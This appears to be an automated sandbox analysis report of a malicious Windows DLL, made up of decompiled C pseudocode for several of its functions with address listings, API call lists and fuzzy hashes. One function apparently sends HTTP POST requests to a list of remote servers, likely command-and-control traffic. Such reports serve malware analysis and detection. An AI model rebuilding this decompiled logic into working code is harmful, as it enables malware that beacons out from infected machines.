                                                                                                                                                                                                0x1000dd78
                                                                                                                                                                                                0x1000dd7e
                                                                                                                                                                                                0x1000dd87
                                                                                                                                                                                                0x1000dd8a
                                                                                                                                                                                                0x1000dd8d
                                                                                                                                                                                                0x1000dd8f
                                                                                                                                                                                                0x1000df05
                                                                                                                                                                                                0x1000df08
                                                                                                                                                                                                0x1000df11
                                                                                                                                                                                                0x1000df11
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000df11
                                                                                                                                                                                                0x1000dd9f
                                                                                                                                                                                                0x1000dda2
                                                                                                                                                                                                0x1000dda9
                                                                                                                                                                                                0x1000ddaf
                                                                                                                                                                                                0x1000ddb2
                                                                                                                                                                                                0x1000ddb5
                                                                                                                                                                                                0x1000ddb8
                                                                                                                                                                                                0x1000ddbb
                                                                                                                                                                                                0x1000ddf7
                                                                                                                                                                                                0x1000ddf7
                                                                                                                                                                                                0x1000ddfa
                                                                                                                                                                                                0x1000dea6
                                                                                                                                                                                                0x1000deba
                                                                                                                                                                                                0x1000deca
                                                                                                                                                                                                0x1000dece
                                                                                                                                                                                                0x1000ded0
                                                                                                                                                                                                0x1000dee7
                                                                                                                                                                                                0x1000deeb
                                                                                                                                                                                                0x1000def4
                                                                                                                                                                                                0x1000deff
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000deff
                                                                                                                                                                                                0x1000ded6
                                                                                                                                                                                                0x1000ded7
                                                                                                                                                                                                0x1000dedc
                                                                                                                                                                                                0x1000dedc
                                                                                                                                                                                                0x1000dede
                                                                                                                                                                                                0x1000dedf
                                                                                                                                                                                                0x1000dee4
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000dee4
                                                                                                                                                                                                0x1000de00
                                                                                                                                                                                                0x1000de00
                                                                                                                                                                                                0x1000de03
                                                                                                                                                                                                0x1000de6e
                                                                                                                                                                                                0x1000de82
                                                                                                                                                                                                0x1000de92
                                                                                                                                                                                                0x1000de96
                                                                                                                                                                                                0x1000de98
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000de9e
                                                                                                                                                                                                0x1000de9f
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000de9f
                                                                                                                                                                                                0x1000de05
                                                                                                                                                                                                0x1000de05
                                                                                                                                                                                                0x1000de08
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000de0a
                                                                                                                                                                                                0x1000de0d
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000de0f
                                                                                                                                                                                                0x1000de0f
                                                                                                                                                                                                0x1000de15
                                                                                                                                                                                                0x1000de31
                                                                                                                                                                                                0x1000de40
                                                                                                                                                                                                0x1000de49
                                                                                                                                                                                                0x1000de4e
                                                                                                                                                                                                0x1000de51
                                                                                                                                                                                                0x1000de57
                                                                                                                                                                                                0x1000de57
                                                                                                                                                                                                0x1000de5c
                                                                                                                                                                                                0x1000de68
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000de68
                                                                                                                                                                                                0x1000de1a
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000de1a
                                                                                                                                                                                                0x1000ddbd
                                                                                                                                                                                                0x1000dde4
                                                                                                                                                                                                0x1000dde9
                                                                                                                                                                                                0x1000ddee
                                                                                                                                                                                                0x1000ddf0
                                                                                                                                                                                                0x1000ddf0
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000ddee
                                                                                                                                                                                                0x1000ddbf
                                                                                                                                                                                                0x1000ddbf
                                                                                                                                                                                                0x1000ddc2
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000ddc8
                                                                                                                                                                                                0x1000ddc8
                                                                                                                                                                                                0x1000ddcb
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000ddd1
                                                                                                                                                                                                0x1000ddd1
                                                                                                                                                                                                0x1000ddd4
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000ddda
                                                                                                                                                                                                0x1000dddd
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000dddf
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000dddf
                                                                                                                                                                                                0x1000df21
                                                                                                                                                                                                0x1000df27
                                                                                                                                                                                                0x1000df2d
                                                                                                                                                                                                0x1000df30
                                                                                                                                                                                                0x1000df33
                                                                                                                                                                                                0x1000df33
                                                                                                                                                                                                0x1000df36
                                                                                                                                                                                                0x1000df37
                                                                                                                                                                                                0x1000df3a
                                                                                                                                                                                                0x1000df3c
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000df8c
                                                                                                                                                                                                0x1000df8c
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000df8c
                                                                                                                                                                                                0x1000dcc3
                                                                                                                                                                                                0x1000dcc9
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000dcc9
                                                                                                                                                                                                0x1000df89
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000dc0c
                                                                                                                                                                                                0x1000dc11
                                                                                                                                                                                                0x1000dc16
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000dc1a

                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 1000D565: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,1000D865,00000C5B,00000000,?,00000000), ref: 1000D578
                                                                                                                                                                                                  • Part of subcall function 1000D565: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,1000D865,00000C5B,00000000,?,00000000), ref: 1000D589
                                                                                                                                                                                                  • Part of subcall function 1000D565: CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?,?,1000D865,00000C5B,00000000,?,00000000), ref: 1000D5A0
                                                                                                                                                                                                  • Part of subcall function 1000D565: SysAllocString.OLEAUT32(00000000), ref: 1000D5AB
                                                                                                                                                                                                  • Part of subcall function 1000D565: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,1000D865,00000C5B,00000000,?,00000000), ref: 1000D5D6
                                                                                                                                                                                                  • Part of subcall function 100085E5: HeapAlloc.KERNEL32(00000008,?,?,10008F65,00000100,?,10005FAC), ref: 100085F3
                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1000DC27
                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1000DC3B
                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 1000DFC4
                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 1000DFCD
                                                                                                                                                                                                  • Part of subcall function 100085FB: HeapFree.KERNEL32(00000000,00000000,00000001,000000FF,10006024), ref: 10008641
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: String$Alloc$Free$HeapInitialize$BlanketCreateInstanceProxySecurity
                                                                                                                                                                                                • String ID: FALSE$TRUE
                                                                                                                                                                                                • API String ID: 224402418-1412513891
                                                                                                                                                                                                • Opcode ID: b00b089e101aed652551e51a4ddbeb04ee9bf59de0f61b667913ab7306e45569
                                                                                                                                                                                                • Instruction ID: 3f90699cde44849cf2b34476e100de7a07988fa2d5f348b69e34af0afe34155d
                                                                                                                                                                                                • Opcode Fuzzy Hash: b00b089e101aed652551e51a4ddbeb04ee9bf59de0f61b667913ab7306e45569
                                                                                                                                                                                                • Instruction Fuzzy Hash: 44E16275D006199FEB04EFE4CC85EAEBBB5FF08380F10855AE505A7299DB30EA05CB60
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1000E6AA, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 83%
                                                                                                                                                                                                			E1000E6AA(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E100095A8(0x85b);
				_v60 = E100095A8(0xdc9);
				_v56 = E100095A8(0x65d);
				_v52 = E100095A8(0xdd3);
				_t105 = E100095A8(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E1000C3BB(_t214));
				_t113 =  *0x1001e6a4; // 0x0
				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0x1001e6a4; // 0x0
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0x1001e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0x1001e6a4; // 0x0
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E100097ED(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0x1001e6a4; // 0x0
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E100097ED(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E100095A8(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0x1001e6a4; // 0x0
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E1000C3BB(_t217), _a4, _a8);
										E100085A3( &_v12);
										if(_a24 != 0) {
											E100097ED(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0x1001e6a4; // 0x0
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E1000972A( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0x1001e6a4; // 0x0
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0x1001e6a4; // 0x0
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0x1001e6a4; // 0x0
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0x1001e6a4; // 0x0
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0x1001e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0x1001e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0x1001e6a4; // 0x0
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0x1001e6a4; // 0x0
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}



































































                                                                                                                                                                                                0x1000e6b3
                                                                                                                                                                                                0x1000e6c5
                                                                                                                                                                                                0x1000e6ce
                                                                                                                                                                                                0x1000e6d8
                                                                                                                                                                                                0x1000e6dc
                                                                                                                                                                                                0x1000e6ed
                                                                                                                                                                                                0x1000e704
                                                                                                                                                                                                0x1000e711
                                                                                                                                                                                                0x1000e71e
                                                                                                                                                                                                0x1000e72b
                                                                                                                                                                                                0x1000e72e
                                                                                                                                                                                                0x1000e733
                                                                                                                                                                                                0x1000e738
                                                                                                                                                                                                0x1000e73a
                                                                                                                                                                                                0x1000e742
                                                                                                                                                                                                0x1000e74d
                                                                                                                                                                                                0x1000e754
                                                                                                                                                                                                0x1000e760
                                                                                                                                                                                                0x1000e763
                                                                                                                                                                                                0x1000e771
                                                                                                                                                                                                0x1000e774
                                                                                                                                                                                                0x1000e77a
                                                                                                                                                                                                0x1000e77b
                                                                                                                                                                                                0x1000e77d
                                                                                                                                                                                                0x1000e786
                                                                                                                                                                                                0x1000e787
                                                                                                                                                                                                0x1000e78c
                                                                                                                                                                                                0x1000e792
                                                                                                                                                                                                0x1000e79c
                                                                                                                                                                                                0x1000e79e
                                                                                                                                                                                                0x1000e7a3
                                                                                                                                                                                                0x1000e7a3
                                                                                                                                                                                                0x1000e7b2
                                                                                                                                                                                                0x1000e7c1
                                                                                                                                                                                                0x1000e7c5
                                                                                                                                                                                                0x1000e7d4
                                                                                                                                                                                                0x1000e7d7
                                                                                                                                                                                                0x1000e7dc
                                                                                                                                                                                                0x1000e7e0
                                                                                                                                                                                                0x1000e7e7
                                                                                                                                                                                                0x1000e7ee
                                                                                                                                                                                                0x1000e7f6
                                                                                                                                                                                                0x1000e7fe
                                                                                                                                                                                                0x1000e805
                                                                                                                                                                                                0x1000e80d
                                                                                                                                                                                                0x1000e815
                                                                                                                                                                                                0x1000e81c
                                                                                                                                                                                                0x1000e824
                                                                                                                                                                                                0x1000e82c
                                                                                                                                                                                                0x1000e841
                                                                                                                                                                                                0x1000e84e
                                                                                                                                                                                                0x1000e850
                                                                                                                                                                                                0x1000e855
                                                                                                                                                                                                0x1000e855
                                                                                                                                                                                                0x1000e85c
                                                                                                                                                                                                0x1000e86d
                                                                                                                                                                                                0x1000e872
                                                                                                                                                                                                0x1000e874
                                                                                                                                                                                                0x1000e874
                                                                                                                                                                                                0x1000e888
                                                                                                                                                                                                0x1000e89a
                                                                                                                                                                                                0x1000e89c
                                                                                                                                                                                                0x1000e89f
                                                                                                                                                                                                0x1000e8a4
                                                                                                                                                                                                0x1000e8a4
                                                                                                                                                                                                0x1000e8ab
                                                                                                                                                                                                0x1000e8ba
                                                                                                                                                                                                0x1000e8be
                                                                                                                                                                                                0x1000e8fc
                                                                                                                                                                                                0x1000e901
                                                                                                                                                                                                0x1000e909
                                                                                                                                                                                                0x1000e90e
                                                                                                                                                                                                0x1000e919
                                                                                                                                                                                                0x1000e91f
                                                                                                                                                                                                0x1000e929
                                                                                                                                                                                                0x1000e92c
                                                                                                                                                                                                0x1000e935
                                                                                                                                                                                                0x1000e93a
                                                                                                                                                                                                0x1000e93a
                                                                                                                                                                                                0x1000e943
                                                                                                                                                                                                0x1000e98c
                                                                                                                                                                                                0x1000e98e
                                                                                                                                                                                                0x1000e995
                                                                                                                                                                                                0x1000e996
                                                                                                                                                                                                0x1000e999
                                                                                                                                                                                                0x1000e99f
                                                                                                                                                                                                0x1000e9a3
                                                                                                                                                                                                0x1000e9a4
                                                                                                                                                                                                0x1000e9a9
                                                                                                                                                                                                0x1000e9ab
                                                                                                                                                                                                0x1000e9b1
                                                                                                                                                                                                0x1000e9c6
                                                                                                                                                                                                0x1000e9ce
                                                                                                                                                                                                0x1000ea03
                                                                                                                                                                                                0x1000ea08
                                                                                                                                                                                                0x1000ea0d
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000ea0f
                                                                                                                                                                                                0x1000e9d0
                                                                                                                                                                                                0x1000e9d2
                                                                                                                                                                                                0x1000e9d2
                                                                                                                                                                                                0x1000e9db
                                                                                                                                                                                                0x1000e9de
                                                                                                                                                                                                0x1000e9e0
                                                                                                                                                                                                0x1000e9e2
                                                                                                                                                                                                0x1000e9e8
                                                                                                                                                                                                0x1000e9e8
                                                                                                                                                                                                0x1000e9ed
                                                                                                                                                                                                0x1000e9ef
                                                                                                                                                                                                0x1000e9f6
                                                                                                                                                                                                0x1000e9f6
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000e9f9
                                                                                                                                                                                                0x1000e9b3
                                                                                                                                                                                                0x1000e9bb
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000e945
                                                                                                                                                                                                0x1000e945
                                                                                                                                                                                                0x1000e94b
                                                                                                                                                                                                0x1000e951
                                                                                                                                                                                                0x1000e954
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000e954
                                                                                                                                                                                                0x1000e943
                                                                                                                                                                                                0x1000e8c0
                                                                                                                                                                                                0x1000e8c6
                                                                                                                                                                                                0x1000e8ca
                                                                                                                                                                                                0x1000e8cb
                                                                                                                                                                                                0x1000e8d0
                                                                                                                                                                                                0x1000e8d2
                                                                                                                                                                                                0x1000e8d8
                                                                                                                                                                                                0x1000e8f6
                                                                                                                                                                                                0x1000e8f6
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000e8f6
                                                                                                                                                                                                0x1000e8da
                                                                                                                                                                                                0x1000e8e4
                                                                                                                                                                                                0x1000e8e6
                                                                                                                                                                                                0x1000e8e7
                                                                                                                                                                                                0x1000e8ec
                                                                                                                                                                                                0x1000e8ee
                                                                                                                                                                                                0x1000e8f4
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000e8ad
                                                                                                                                                                                                0x1000e8ad
                                                                                                                                                                                                0x1000e956
                                                                                                                                                                                                0x1000e956
                                                                                                                                                                                                0x1000e95c
                                                                                                                                                                                                0x1000e95f
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000e95f
                                                                                                                                                                                                0x1000e85e
                                                                                                                                                                                                0x1000e85e
                                                                                                                                                                                                0x1000e961
                                                                                                                                                                                                0x1000e961
                                                                                                                                                                                                0x1000e967
                                                                                                                                                                                                0x1000e96a
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000e96a
                                                                                                                                                                                                0x1000e85c
                                                                                                                                                                                                0x1000e7c7
                                                                                                                                                                                                0x1000e96c
                                                                                                                                                                                                0x1000e96f
                                                                                                                                                                                                0x1000e971
                                                                                                                                                                                                0x1000e974
                                                                                                                                                                                                0x1000e977
                                                                                                                                                                                                0x1000e980
                                                                                                                                                                                                0x1000e985
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000e989
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000e989
                                                                                                                                                                                                0x1000e796
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$ErrorLast
                                                                                                                                                                                                • String ID: POST
                                                                                                                                                                                                • API String ID: 2570506013-1814004025
                                                                                                                                                                                                • Opcode ID: 5a0725573e378c80a65e7a2a1159a5cfc04c149060dda8d6e7e239403e9697d9
                                                                                                                                                                                                • Instruction ID: f9dd7afb372abb5d351a9ef47c86561eaabd2c0e7409e6987b0a63c15f5cbcc7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a0725573e378c80a65e7a2a1159a5cfc04c149060dda8d6e7e239403e9697d9
                                                                                                                                                                                                • Instruction Fuzzy Hash: FCB14EB1900258AFEB55CFA4CC88E9EBBF8EF58391F104169F505EB290DB749E44CB61
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 100116F0, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70libraryloaderCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 28%
                                                                                                                                                                                                			E100116F0(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}















                                                                                                                                                                                                0x100116f9
                                                                                                                                                                                                0x10011700
                                                                                                                                                                                                0x10011709
                                                                                                                                                                                                0x1001170d
                                                                                                                                                                                                0x10011788
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1001178a
                                                                                                                                                                                                0x1001171b
                                                                                                                                                                                                0x1001171d
                                                                                                                                                                                                0x10011722
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1001172a
                                                                                                                                                                                                0x1001172c
                                                                                                                                                                                                0x10011731
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1001173b
                                                                                                                                                                                                0x1001173f
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10011741
                                                                                                                                                                                                0x10011746
                                                                                                                                                                                                0x10011748
                                                                                                                                                                                                0x10011749
                                                                                                                                                                                                0x1001174d
                                                                                                                                                                                                0x10011753
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1001175e
                                                                                                                                                                                                0x10011767
                                                                                                                                                                                                0x1001176b
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1001176d
                                                                                                                                                                                                0x1001176f
                                                                                                                                                                                                0x10011777
                                                                                                                                                                                                0x10011779
                                                                                                                                                                                                0x1001177a
                                                                                                                                                                                                0x10011782
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,1000763B,?,?,00000000,?), ref: 10011703
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 1001171B
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 1001172A
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 10011739
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                                                                                • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                                • API String ID: 667068680-129414566
                                                                                                                                                                                                • Opcode ID: 28a6bd55db4c52fb8d64142f74f2f0f370d8df5068d6a386676288cd47c78c0a
                                                                                                                                                                                                • Instruction ID: 1d873b0b542639c3e1302bc7ac39bee5e88f59f20418ff601a6babcc510261b2
                                                                                                                                                                                                • Opcode Fuzzy Hash: 28a6bd55db4c52fb8d64142f74f2f0f370d8df5068d6a386676288cd47c78c0a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 10117735D04619BBDB51DBA99C88DEE7AF9EF45681F110064EA11EA240D730CF418764
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1001215A, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                			E1001215A(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t26);
				L100122BD();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L10012305();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
